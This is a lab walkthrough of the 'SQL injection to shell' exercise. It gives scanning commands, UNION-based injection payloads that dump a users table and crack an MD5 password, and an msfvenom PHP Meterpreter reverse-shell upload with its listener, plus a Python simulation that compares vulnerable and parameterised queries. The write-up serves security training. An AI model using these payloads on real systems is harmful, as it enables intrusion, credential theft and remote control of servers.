SQL injection to shell
Lab Environment
Attacker's Machine - Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux
Vulnerable Machine - SQL injection to shell
Proof Of Concept
- arp-scan --localnet (lists the hosts on the local network by ARP)
- vulnerable machine IP - 172.16.60.160
Next I ran nmap against that IP for a closer look:
- nmap -sSCV 172.16.60.160 (-sS SYN scan, -sC default scripts, -sV service version detection)
It showed an HTTP service open on port 80.
Since port 80 was open, I browsed to the IP to look at the web page.
The page offered several links to click on; I chose test.
The test link loaded a page whose id parameter is passed in the URL by GET (id=1), which is a candidate for SQL injection.
I checked it by appending an apostrophe (') after id=1.
The application returned a SQL syntax error, which confirmed that the parameter is placed into the query unsanitised and that database errors are echoed to the page.
Note: every injection payload below is appended to the URL after id=1. The trailing --+ comments out the rest of the query; the + is decoded to the space MySQL requires after -- .
Now the attack proper: extracting information by passing queries in the URL.
- order by 5 --+ (ORDER BY n sorts by the n-th selected column, so it errors as soon as n exceeds the number of columns the query returns)
ORDER BY 5 returned the error "Unknown column '5' in 'order clause'", meaning the query returns fewer than 5 columns.
So I tried 4:
- order by 4 --+
The page rendered normally, so the query returns exactly 4 columns.
Having found the number of columns, I used a UNION to see which column is rendered on the page:
Command: url union select 1,2,3,4 --+
The number 2 appeared on the page, which means the second column is reflected in the output and can be used to extract data. (If only the original row shows up, use an id that matches no row, such as id=-1, so the UNION row is the only one rendered.)
Database version extraction: union select 1,version(),3,4 --+
Table name extraction: union select 1,table_name,3,4 from information_schema.tables --+ (wrapping table_name in group_concat() returns all names in one row; adding where table_schema=database() limits the list to the application's own schema)
Column extraction: union select 1,column_name,3,4 from information_schema.columns where table_name='users' --+ (if quotes are filtered, the name can be given as a hex literal: table_name=0x7573657273)
Now extracting id, login and password:
union select 1,group_concat(id,0x0a,login,0x0a,password),3,4 from users --+
Note: 0x0a is a line feed (newline) used only as a separator between id, login and password; group_concat() joins all rows into a single string so everything fits in the one reflected column.
The login name is admin and the password is stored as a hash rather than in clear text. A 32-character hex string of this shape is an MD5 hash, and searching for it on Google turned up a public lookup table with the plaintext.
Result after cracking the hash: P4ssw0rd
An unsalted MD5 hash of a common password can be looked up or brute-forced in seconds, so the hash is no real protection once the database can be read.
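The injection steps above (apostrophe check, ORDER BY column count, UNION marker, group_concat dump, checking the cracked plaintext against the hash) simulated end to end, as an added example; this is my own code, not part of the original write-up or of the lab. It uses an in-memory SQLite database in place of the lab's MySQL back end, so version() and information_schema are not covered and the concatenation inside group_concat uses SQLite's || and char(10) instead of MySQL's multi-argument form. The pictures table, its column names and the sample rows are constructed; only users(id, login, password) comes from the write-up. The vulnerable page concatenates the id parameter exactly as the lab's page does, and a parameterised version sits beside it so the same attack functions can be run against both.

```python
import hashlib
import re
import sqlite3


def build_db():
    """Constructed stand-in for the lab's database (not the real back end).

    Only users(id, login, password) is taken from the write-up; the pictures
    table, its column names and the sample rows are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, login TEXT, password TEXT);
        CREATE TABLE pictures (id INTEGER, title TEXT, filename TEXT, cat INTEGER);
        INSERT INTO pictures VALUES (1, 'Picture one', 'one.jpg', 1);
        INSERT INTO pictures VALUES (2, 'Picture two', 'two.jpg', 2);
    """)
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)",
               (hashlib.md5(b"P4ssw0rd").hexdigest(),))
    db.commit()
    return db


def vulnerable_app(db, id_param):
    """Models the lab's page: the id value is concatenated into the SQL and the
    database error text is echoed, which is what the apostrophe test relies on.
    The second selected column (title) is rendered, as in the lab."""
    sql = "SELECT id, title, filename, cat FROM pictures WHERE cat=" + id_param
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "<p>Error: %s</p>" % exc
    return "".join("<li>%s</li>" % row[1] for row in rows)


def safe_app(db, id_param):
    """Hardened form: a bound parameter, so the payload is compared as data."""
    sql = "SELECT id, title, filename, cat FROM pictures WHERE cat=?"
    rows = db.execute(sql, (id_param,)).fetchall()
    return "".join("<li>%s</li>" % row[1] for row in rows)


def count_columns(app, limit=20):
    """ORDER BY walk: the first n that errors means the query has n-1 columns.
    Returns None when nothing errors, e.g. against the parameterised page."""
    for n in range(1, limit + 1):
        if "Error" in app("1 order by %d -- " % n):
            return n - 1
    return None


def find_reflected_column(app, ncols):
    """UNION SELECT 1,2,...,n and report which markers land in the page."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    page = app("1 union select %s -- " % markers)
    return [i for i in range(1, ncols + 1) if "<li>%d</li>" % i in page]


def dump_users(app, ncols, col):
    """Put group_concat() in the reflected column. SQLite needs || and char(10)
    where MySQL's group_concat(id,0x0a,login,0x0a,password) takes several
    arguments; the newline separator is the same idea. id=-1 matches no real
    row, so the UNION row is the only thing rendered."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[col - 1] = ("group_concat(id || char(10) || login || char(10) || password,"
                     " char(10))")
    page = app("-1 union select %s from users -- " % ",".join(cols))
    creds = []
    for item in re.findall(r"<li>(.*?)</li>", page, re.S):
        parts = item.split("\n")
        if len(parts) >= 3 and len(parts) % 3 == 0:
            creds.extend(tuple(parts[j:j + 3]) for j in range(0, len(parts), 3))
    return creds


def verify_md5(digest, candidate):
    """Confirms a looked-up plaintext really hashes to the dumped value."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest.lower()


if __name__ == "__main__":
    db = build_db()
    for name, page_fn in (("vulnerable", vulnerable_app), ("parameterised", safe_app)):
        app = lambda p, page_fn=page_fn: page_fn(db, p)
        print(name, "page")
        print("  apostrophe test:", app("1'")[:40])
        ncols = count_columns(app)
        print("  columns:", ncols)
        if ncols:
            reflected = find_reflected_column(app, ncols)
            print("  reflected column(s):", reflected)
            if reflected:
                for row in dump_users(app, ncols, reflected[0]):
                    print("  dumped:", row, "P4ssw0rd?", verify_md5(row[2], "P4ssw0rd"))
```

Against the vulnerable page the walk stops at ORDER BY 5, the marker 2 is the one rendered, and the dump returns the admin row with its MD5; against the parameterised page every payload is compared as a string that matches no category, so nothing errors, nothing is reflected and nothing is dumped.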
Back on the home page I clicked the admin link, which led to the admin login panel.
I logged in with the credentials obtained from the SQL injection.
After login the panel offered a page to add a new picture, i.e. a file upload.
Next I generated a PHP payload to upload through that form and get code execution on the server.
Payload generation command: msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=1337 -f raw > /root/Desktop/upload.php
(-f raw writes the plain PHP source; the trailing R in older msfvenom invocations meant the same thing. The file only does anything if the server executes it as PHP, so the uploaded name must keep an extension the web server runs.)
Then I started a listener in msfconsole to catch the connection once the payload is uploaded and executed:
Command to configure the listener: use exploit/multi/handler
Listener settings: set payload php/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 1337
Then simply type run to start it.
Refreshing the browser on the uploaded file executed the PHP, and the handler received a Meterpreter session.